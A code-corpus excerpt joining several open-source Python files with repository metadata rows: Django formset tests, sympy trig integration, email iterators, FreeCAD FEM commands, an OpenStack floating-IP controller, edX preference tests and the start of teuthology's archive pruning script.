self.assertEqual(profile1.age, 54)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" value="54" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '1',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': six.text_type(owner1.auto_id),
'ownerprofile-0-age': '55',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
self.assertEqual(profile1.age, 55)
def test_unique_true_enforces_max_num_one(self):
# ForeignKey with unique=True should enforce max_num=1
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Location, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_location_set-0-lat">Lat:</label> <input id="id_location_set-0-lat" type="text" name="location_set-0-lat" maxlength="100" /></p>\n'
'<p><label for="id_location_set-0-lon">Lon:</label> <input id="id_location_set-0-lon" type="text" name="location_set-0-lon" maxlength="100" /><input type="hidden" name="location_set-0-place" value="1" id="id_location_set-0-place" /><input type="hidden" name="location_set-0-id" id="id_location_set-0-id" /></p>')
def test_foreign_keys_in_parents(self):
self.assertEqual(type(_get_foreign_key(Restaurant, Owner)), models.ForeignKey)
self.assertEqual(type(_get_foreign_key(MexicanRestaurant, Owner)), models.ForeignKey)
def test_unique_validation(self):
FormSet = modelformset_factory(Product, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
product1, = saved
self.assertEqual(product1.slug, 'car-red')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'slug': ['Product with this Slug already exists.']}])
def test_unique_together_validation(self):
FormSet = modelformset_factory(Price, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
price1, = saved
self.assertEqual(price1.price, Decimal('12.00'))
self.assertEqual(price1.quantity, 1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Price with this Price and Quantity already exists.']}])
def test_unique_together_with_inlineformset_factory(self):
# Also see bug #8882.
repository = Repository.objects.create(name='Test Repo')
FormSet = inlineformset_factory(Repository, Revision, extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
revision1, = saved
self.assertEqual(revision1.repository, repository)
self.assertEqual(revision1.revision, '146239817507f148d448db38840db7c3cbf47c76')
        # attempt to save the same revision against the same repo.
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Revision with this Repository and Revision already exists.']}])
# unique_together with inlineformset_factory with overridden form fields
# Also see #9494
FormSet = inlineformset_factory(Repository, Revision, fields=('revision',), extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
def test_callable_defaults(self):
# Use of callable defaults (see bug #7975).
person = Person.objects.create(name='Ringo')
FormSet = inlineformset_factory(Person, Membership, can_delete=False, extra=1)
formset = FormSet(instance=person)
# Django will render a hidden field for model fields that have a callable
# default. This is required to ensure the value is tested for change correctly
        # when determining which extra forms have changed and need to be saved.
self.assertEqual(len(formset.forms), 1) # this formset only has one form
form = formset.forms[0]
now = form.fields['date_joined'].initial()
result = form.as_p()
result = re.sub(r'\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?', '__DATETIME__', result)
self.assertHTMLEqual(result,
'<p><label for="id_membership_set-0-date_joined">Date joined:</label> <input type="text" name="membership_set-0-date_joined" value="__DATETIME__" id="id_membership_set-0-date_joined" /><input type="hidden" name="initial-membership_set-0-date_joined" value="__DATETIME__" id="initial-membership_set-0-id_membership_set-0-date_joined" /></p>\n'
'<p><label for="id_membership_set-0-karma">Karma:</label> <input type="text" name="membership_set-0-karma" id="id_membership_set-0-karma" /><input type="hidden" name="membership_set-0-person" value="%d" id="id_membership_set-0-person" /><input type="hidden" name="membership_set-0-id" id="id_membership_set-0-id" /></p>'
% person.id)
        # test validation with callable defaults; validation relies on the hidden initial fields
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
# now test for when the data changes
one_day_later = now + datetime.timedelta(days=1)
filled_data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(one_day_later.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(filled_data, instance=person)
self.assertFalse(formset.is_valid())
# now test with split datetime fields
class MembershipForm(forms.ModelForm):
date_joined = forms.SplitDateTimeField(initial=now)
class Meta:
model = Membership
def __init__(self, **kwargs):
super(MembershipForm, self).__init__(**kwargs)
self.fields['date_joined'].widget = forms.SplitDateTimeWidget()
FormSet = inlineformset_factory(Person, Membership, form=MembershipForm, can_delete=False, extra=1)
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined_0': six.text_type(now.strftime('%Y-%m-%d')),
'membership_set-0-date_joined_1': six.text_type(now.strftime('%H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
def test_inlineformset_factory_with_null_fk(self):
# inlineformset_factory tests with fk having null=True. see #9462.
        # create some data that will exhibit the issue
team = Team.objects.create(name="Red Vipers")
Player(name="Timmy").save()
Player(name="Bobby", team=team).save()
PlayerInlineFormSet = inlineformset_factory(Team, Player)
formset = PlayerInlineFormSet()
self.assertQuerysetEqual(formset.get_queryset(), [])
formset = PlayerInlineFormSet(instance=team)
players = formset.get_queryset()
self.assertEqual(len(players), 1)
player1, = players
self.assertEqual(player1.team, team)
self.assertEqual(player1.name, 'Bobby')
def test_model_formset_with_custom_pk(self):
# a formset for a Model that has a custom primary key that still needs to be
# added to the formset automatically
FormSet = modelformset_factory(ClassyMexicanRestaurant, fields=["tacos_are_yummy"])
self.assertEqual(sorted(FormSet().forms[0].fields.keys()), ['restaurant', 'tacos_are_yummy'])
def test_prevent_duplicates_from_with_the_same_formset(self):
FormSet = modelformset_factory(Product, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'red_car',
'form-1-slug': 'red_car',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug.'])
FormSet = modelformset_factory(Price, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-price': '25',
'form-0-quantity': '7',
'form-1-price': '25',
'form-1-quantity': '7',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for price and quantity, which must be unique.'])
        # Only the price field is specified, so this should skip any unique checks
        # since the unique_together constraint is not fulfilled. This would fail with
        # a KeyError if broken.
FormSet = modelformset_factory(Price, fields=("price",), extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '24',
'form-1-price': '24',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
FormSet = inlineformset_factory(Author, Book, extra=0)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
book_ids = author.book_set.order_by('id').values_list('id', flat=True)
data = {
'book_set-TOTAL_FORMS': '2',
'book_set-INITIAL_FORMS': '2',
'book_set-MAX_NUM_FORMS': '',
'book_set-0-title': 'The 2008 Election',
'book_set-0-author': str(author.id),
'book_set-0-id': str(book_ids[0]),
'book_set-1-title': 'The 2008 Election',
'book_set-1-author': str(author.id),
'book_set-1-id': str(book_ids[1]),
}
formset = FormSet(data=data, instance=author)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
FormSet = modelformset_factory(Post, extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'blah',
'form-0-slug': 'Morning',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-01-01'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title which must be unique for the date in posted.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug which must be unique for the year in posted.'])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'rawr',
'form-0-posted': '2008-08-01',
'form-1-title': 'blah',
'form-1-slug': 'Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for subtitle which must be unique for the month in posted.'])
| agpl-3.0 | 7,439,276,844,429,428,000 | 50.409396 | 381 | 0.602529 | false |
hargup/sympy | sympy/integrals/trigonometry.py | 83 | 10631 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy.core import cacheit, Dummy, Eq, Integer, Rational, S, Wild
from sympy.functions import binomial, sin, cos, Piecewise
# TODO sin(a*x)*cos(b*x) -> ( sin((a+b)*x) + sin((a-b)*x) ) / 2 ?
# creating Wild symbols and sin/cos/Mul on every call is expensive. Also, our
# match & subs are very slow when not cached, and if we created the Wilds each
# time, we would effectively block caching.
#
# so we cache the pattern
# need to use a function instead of lambda since hash of lambda changes on
# each call to _pat_sincos
def _integer_instance(n):
    return isinstance(n, Integer)
@cacheit
def _pat_sincos(x):
a = Wild('a', exclude=[x])
n, m = [Wild(s, exclude=[x], properties=[_integer_instance])
for s in 'nm']
pat = sin(a*x)**n * cos(a*x)**m
return pat, a, n, m
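# Illustrative sketch (not part of the original module): matching a rewritten
# expression against the cached pattern yields a dict keyed by the Wild symbols,
# e.g. for f = sin(3*x)**2*cos(3*x):
#   pat, a, n, m = _pat_sincos(x)
#   M = f.rewrite('sincos').match(pat)   # roughly {a: 3, n: 2, m: 1}
# trigintegrate() below reads M[a], M[n] and M[m] from exactly such a dict.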
_u = Dummy('u')
def trigintegrate(f, x, conds='piecewise'):
"""Integrate f = Mul(trig) over x
>>> from sympy import Symbol, sin, cos, tan, sec, csc, cot
>>> from sympy.integrals.trigonometry import trigintegrate
>>> from sympy.abc import x
>>> trigintegrate(sin(x)*cos(x), x)
sin(x)**2/2
>>> trigintegrate(sin(x)**2, x)
x/2 - sin(x)*cos(x)/2
>>> trigintegrate(tan(x)*sec(x), x)
1/cos(x)
>>> trigintegrate(sin(x)*tan(x), x)
-log(sin(x) - 1)/2 + log(sin(x) + 1)/2 - sin(x)
http://en.wikibooks.org/wiki/Calculus/Integration_techniques
See Also
========
sympy.integrals.integrals.Integral.doit
sympy.integrals.integrals.Integral
"""
from sympy.integrals.integrals import integrate
pat, a, n, m = _pat_sincos(x)
f = f.rewrite('sincos')
M = f.match(pat)
if M is None:
return
n, m = M[n], M[m]
if n is S.Zero and m is S.Zero:
return x
zz = x if n is S.Zero else S.Zero
a = M[a]
if n.is_odd or m.is_odd:
u = _u
n_, m_ = n.is_odd, m.is_odd
# take smallest n or m -- to choose simplest substitution
if n_ and m_:
n_ = n_ and (n < m) # NB: careful here, one of the
m_ = m_ and not (n < m) # conditions *must* be true
# n m u=C (n-1)/2 m
# S(x) * C(x) dx --> -(1-u^2) * u du
if n_:
ff = -(1 - u**2)**((n - 1)/2) * u**m
uu = cos(a*x)
# n m u=S n (m-1)/2
# S(x) * C(x) dx --> u * (1-u^2) du
elif m_:
ff = u**n * (1 - u**2)**((m - 1)/2)
uu = sin(a*x)
fi = integrate(ff, u) # XXX cyclic deps
fx = fi.subs(u, uu)
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (fx / a, True))
return fx / a
# n & m are both even
#
# 2k 2m 2l 2l
# we transform S (x) * C (x) into terms with only S (x) or C (x)
#
# example:
# 100 4 100 2 2 100 4 2
# S (x) * C (x) = S (x) * (1-S (x)) = S (x) * (1 + S (x) - 2*S (x))
#
# 104 102 100
# = S (x) - 2*S (x) + S (x)
# 2k
# then S is integrated with recursive formula
# take largest n or m -- to choose simplest substitution
n_ = (abs(n) > abs(m))
m_ = (abs(m) > abs(n))
res = S.Zero
if n_:
# 2k 2 k i 2i
# C = (1 - S ) = sum(i, (-) * B(k, i) * S )
if m > 0:
for i in range(0, m//2 + 1):
res += ((-1)**i * binomial(m//2, i) *
_sin_pow_integrate(n + 2*i, x))
elif m == 0:
res = _sin_pow_integrate(n, x)
else:
# m < 0 , |n| > |m|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# -1 m+1 n-1 n - 1 | m+2 n-2
# ________ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# m + 1 m + 1 |
# /
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
trigintegrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
elif m_:
# 2k 2 k i 2i
# S = (1 - C ) = sum(i, (-) * B(k, i) * C )
if n > 0:
# / /
# | |
# | m n | -m n
# | cos (x)*sin (x) dx or | cos (x) * sin (x) dx
# | |
# / /
#
# |m| > |n| ; m, n >0 ; m, n belong to Z - {0}
# n 2
# sin (x) term is expanded here in terms of cos (x),
# and then integrated.
#
for i in range(0, n//2 + 1):
res += ((-1)**i * binomial(n//2, i) *
_cos_pow_integrate(m + 2*i, x))
elif n == 0:
# /
# |
# | 1
# | _ _ _
# | m
# | cos (x)
# /
#
res = _cos_pow_integrate(m, x)
else:
# n < 0 , |m| > |n|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# 1 m-1 n+1 m - 1 | m-2 n+2
# _______ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# n + 1 n + 1 |
# /
res = (Rational(1, n + 1) * cos(x)**(m - 1)*sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
trigintegrate(cos(x)**(m - 2)*sin(x)**(n + 2), x))
else:
if m == n:
##Substitute sin(2x)/2 for sin(x)cos(x) and then Integrate.
res = integrate((Rational(1, 2)*sin(2*x))**m, x)
elif (m == -n):
if n < 0:
                # Same as the scheme described above.
                # The function argument to integrate() will in the end
                # be 1, which cannot be integrated by trigintegrate.
                # Hence use sympy.integrals.integrate.
res = (Rational(1, n + 1) * cos(x)**(m - 1) * sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
integrate(cos(x)**(m - 2) * sin(x)**(n + 2), x))
else:
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
integrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (res.subs(x, a*x) / a, True))
return res.subs(x, a*x) / a
def _sin_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break
return -cos(x)
# n > 0
# / /
# | |
# | n -1 n-1 n - 1 | n-2
# | sin (x) dx = ______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n n |
#/ /
#
#
return (Rational(-1, n) * cos(x) * sin(x)**(n - 1) +
Rational(n - 1, n) * _sin_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Make sure this does not come back here again.
##Recursion breaks here or at n==0.
return trigintegrate(1/sin(x), x)
# n < 0
# / /
# | |
# | n 1 n+1 n + 2 | n+2
# | sin (x) dx = _______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(1, n + 1) * cos(x) * sin(x)**(n + 1) +
Rational(n + 2, n + 1) * _sin_pow_integrate(n + 2, x))
else:
#n == 0
#Recursion break.
return x
def _cos_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break.
return sin(x)
        # n > 0
        #    /                                               /
        #   |                                               |
        #   |    n           1              n-1      n - 1  |   n-2
        #   | cos (x) dx = ______ sin (x) cos (x) + _______ | cos (x) dx
        #   |                                               |
        #   |                 n                        n    |
        #  /                                               /
        #
return (Rational(1, n) * sin(x) * cos(x)**(n - 1) +
Rational(n - 1, n) * _cos_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Recursion break
return trigintegrate(1/cos(x), x)
# n < 0
# / /
# | |
# | n -1 n+1 n + 2 | n+2
# | cos (x) dx = _______ sin (x) cos (x) + _______ | cos (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(-1, n + 1) * sin(x) * cos(x)**(n + 1) +
Rational(n + 2, n + 1) * _cos_pow_integrate(n + 2, x))
else:
# n == 0
#Recursion Break.
return x
| bsd-3-clause | -6,437,232,332,191,155,000 | 32.642405 | 80 | 0.312859 | false |
buqing2009/MissionPlanner | Lib/email/iterators.py | 68 | 2275 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Various types of useful iterators and generators."""
__all__ = [
'body_line_iterator',
'typed_subpart_iterator',
'walk',
# Do not include _structure() since it's part of the debugging API.
]
import sys
from cStringIO import StringIO
# This function will become a method of the Message class
def walk(self):
"""Walk over the message tree, yielding each subpart.
The walk is performed in depth-first order. This method is a
generator.
"""
yield self
if self.is_multipart():
for subpart in self.get_payload():
for subsubpart in subpart.walk():
yield subsubpart
# These two functions are imported into the Iterators.py interface module.
def body_line_iterator(msg, decode=False):
"""Iterate over the parts, returning string payloads line-by-line.
Optional decode (default False) is passed through to .get_payload().
"""
for subpart in msg.walk():
payload = subpart.get_payload(decode=decode)
if isinstance(payload, basestring):
for line in StringIO(payload):
yield line
def typed_subpart_iterator(msg, maintype='text', subtype=None):
"""Iterate over the subparts with a given MIME type.
Use `maintype' as the main MIME type to match against; this defaults to
"text". Optional `subtype' is the MIME subtype to match against; if
omitted, only the main type is matched.
"""
for subpart in msg.walk():
if subpart.get_content_maintype() == maintype:
if subtype is None or subpart.get_content_subtype() == subtype:
yield subpart
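# Hedged usage sketch (not part of the original module); `raw_mail_text` is an
# assumed placeholder for an RFC 2822 message string:
#   from email import message_from_string
#   msg = message_from_string(raw_mail_text)
#   for part in typed_subpart_iterator(msg, 'text', 'plain'):
#       print part.get_payload(decode=True)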
def _structure(msg, fp=None, level=0, include_default=False):
"""A handy debugging aid"""
if fp is None:
fp = sys.stdout
tab = ' ' * (level * 4)
print >> fp, tab + msg.get_content_type(),
if include_default:
print >> fp, '[%s]' % msg.get_default_type()
else:
print >> fp
if msg.is_multipart():
for subpart in msg.get_payload():
_structure(subpart, fp, level+1, include_default)
| gpl-3.0 | -5,882,983,571,060,583,000 | 27.973684 | 75 | 0.62022 | false |
maurerpe/FreeCAD | src/Mod/Fem/FemCommands.py | 3 | 6302 | #***************************************************************************
#* *
#* Copyright (c) 2015 - FreeCAD Developers *
#* Author (c) 2015 - Przemo Fiszt < [email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
__title__ = "Fem Commands"
__author__ = "Przemo Firszt"
__url__ = "http://www.freecadweb.org"
import FreeCAD
if FreeCAD.GuiUp:
import FreeCADGui
import FemGui
from PySide import QtCore
class FemCommands(object):
def __init__(self):
self.resources = {'Pixmap': 'fem-frequency-analysis',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command MenuText"),
'Accel': "",
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command ToolTip")}
#FIXME add option description
self.is_active = None
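        # Values recognized by IsActive() below (descriptions derived from that
        # method, not an exhaustive API contract):
        #   None                           - command is never active
        #   'with_document'                - an active document exists
        #   'with_analysis'                - an active analysis lives in the active document
        #   'with_results'                 - analysis present and it holds result objects
        #   'with_part_feature'            - exactly one Part::Feature is selected
        #   'with_solver'                  - analysis present and a solver object is selected
        #   'with_analysis_without_solver' - analysis present but without a solver yet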
def GetResources(self):
return self.resources
def IsActive(self):
if not self.is_active:
active = False
elif self.is_active == 'with_document':
active = FreeCADGui.ActiveDocument is not None
elif self.is_active == 'with_analysis':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc()
elif self.is_active == 'with_results':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.results_present()
elif self.is_active == 'with_part_feature':
active = FreeCADGui.ActiveDocument is not None and self.part_feature_selected()
elif self.is_active == 'with_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.solver_selected()
elif self.is_active == 'with_analysis_without_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and not self.analysis_has_solver()
return active
def results_present(self):
results = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom('Fem::FemResultObject'):
results = True
return results
def part_feature_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Part::Feature"):
return True
else:
return False
def active_analysis_in_active_doc(self):
return FemGui.getActiveAnalysis().Document is FreeCAD.ActiveDocument
def solver_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Fem::FemSolverObjectPython"):
return True
else:
return False
def analysis_has_solver(self):
solver = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom("Fem::FemSolverObjectPython"):
solver = True
if solver is True:
return True
else:
return False
def hide_parts_constraints_show_meshes(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
#if "Constraint" in acnstrmesh.TypeId:
# acnstrmesh.ViewObject.Visibility = False
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = False
acnstrmesh.ViewObject.Visibility = True # OvG: Hide constraints and parts and show meshes
def hide_meshes_show_parts_constraints(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
if "Constraint" in acnstrmesh.TypeId:
acnstrmesh.ViewObject.Visibility = True
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = True
acnstrmesh.ViewObject.Visibility = False # OvG: Hide meshes and show constraints and meshed part e.g. on purging results
| lgpl-2.1 | 502,027,295,243,265,300 | 50.235772 | 145 | 0.515233 | false |
spjmurray/openstack-sentinel | sentinel/api/controllers/network/v2/floatingips.py | 1 | 1120 | # Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pecan
import pecan.decorators
from sentinel.api.controllers.base import BaseController
from sentinel.scope import Scope
class NetworkV2FloatingipsController(BaseController):
service = u'network'
resource = u'floatingip'
collection = u'floatingips'
@pecan.expose('json')
@pecan.decorators.accept_noncanonical
def get_all(self):
floatingips = Scope.filter(self.network.list_floatingips())
return self.format_collection(floatingips, links=False)
# vi: ts=4 et:
| apache-2.0 | -5,755,952,018,048,773,000 | 31 | 78 | 0.733036 | false |
xiandiancloud/ji | common/djangoapps/user_api/tests/test_models.py | 52 | 1757 | from django.db import IntegrityError
from django.test import TestCase
from student.tests.factories import UserFactory
from user_api.tests.factories import UserPreferenceFactory
from user_api.models import UserPreference
class UserPreferenceModelTest(TestCase):
def test_duplicate_user_key(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey", value="first")
self.assertRaises(
IntegrityError,
UserPreferenceFactory.create,
user=user,
key="testkey",
value="second"
)
def test_arbitrary_values(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey0", value="")
UserPreferenceFactory.create(user=user, key="testkey1", value="This is some English text!")
UserPreferenceFactory.create(user=user, key="testkey2", value="{'some': 'json'}")
UserPreferenceFactory.create(
user=user,
key="testkey3",
value="\xe8\xbf\x99\xe6\x98\xaf\xe4\xb8\xad\xe5\x9b\xbd\xe6\x96\x87\xe5\xad\x97'"
)
def test_get_set_preference(self):
# Checks that you can set a preference and get that preference later
# Also, tests that no preference is returned for keys that are not set
user = UserFactory.create()
key = 'testkey'
value = 'testvalue'
# does a round trip
UserPreference.set_preference(user, key, value)
pref = UserPreference.get_preference(user, key)
self.assertEqual(pref, value)
# get preference for key that doesn't exist for user
pref = UserPreference.get_preference(user, 'testkey_none')
self.assertIsNone(pref)
| agpl-3.0 | 6,458,343,760,129,347,000 | 36.382979 | 99 | 0.656801 | false |
caibo2014/teuthology | teuthology/prune.py | 3 | 4784 | import logging
import os
import shutil
import time
import teuthology
from teuthology.contextutil import safe_while
log = logging.getLogger(__name__)
# If we see this in any directory, we do not prune it
PRESERVE_FILE = '.preserve'
def main(args):
"""
Main function; parses args and calls prune_archive()
"""
verbose = args['--verbose']
if verbose:
teuthology.log.setLevel(logging.DEBUG)
archive_dir = args['--archive']
dry_run = args['--dry-run']
pass_days = int(args['--pass'])
remotes_days = int(args['--remotes'])
prune_archive(archive_dir, pass_days, remotes_days, dry_run)
